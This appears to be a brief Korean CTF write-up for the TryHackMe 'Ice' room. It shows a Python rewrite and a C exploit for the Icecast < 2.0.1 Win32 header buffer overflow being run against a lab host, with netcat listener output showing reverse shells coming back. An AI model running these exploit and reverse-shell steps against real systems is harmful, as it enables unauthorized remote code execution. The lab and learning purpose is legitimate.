
Icecast Header Overwrite 버퍼 오버플로 RCE 2.0.1 미만 (Win32)
Python 3 Icecast 헤더 덮어쓰기 버퍼 오버플로우 RCE < 2.0.1 (Win32), 이 Metasploit 모듈에서 재작성함. 이것이 작동하지 않아서 Metasploit 모듈에서 재작성했습니다.
익스플로이트의 리버스 셸 셸코드를 교체하고, 원격 서버와 포트를 인자로 호출합니다.
root@Kali:~/TryHackme/Ice# ./icecast.py 192.168.92.133 8000
Done!
리버스 셸 리스너:
root@Kali:~/TryHackme/Ice# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49211
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Icecast2 Win32>
원본 익스플로이트를 작동시키는 데 성공했습니다. 이것에 따라 수정했습니다.
root@Kali:~/TryHackme/Ice# gcc 568-edit.c -o 568
root@Kali:~/TryHackme/Ice# ./568 192.168.92.133
Icecast <= 2.0.1 Win32 remote code execution 0.1
by Luigi Auriemma
e-mail: [email protected]
web:http://aluigi.altervista.org
shellcode add-on by Delikon
www.delikon.de
- target 192.168.92.133:8000
- send malformed data
Server IS vulnerable!!!
리스너에서
root@Kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49238
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Icecast2 Win32>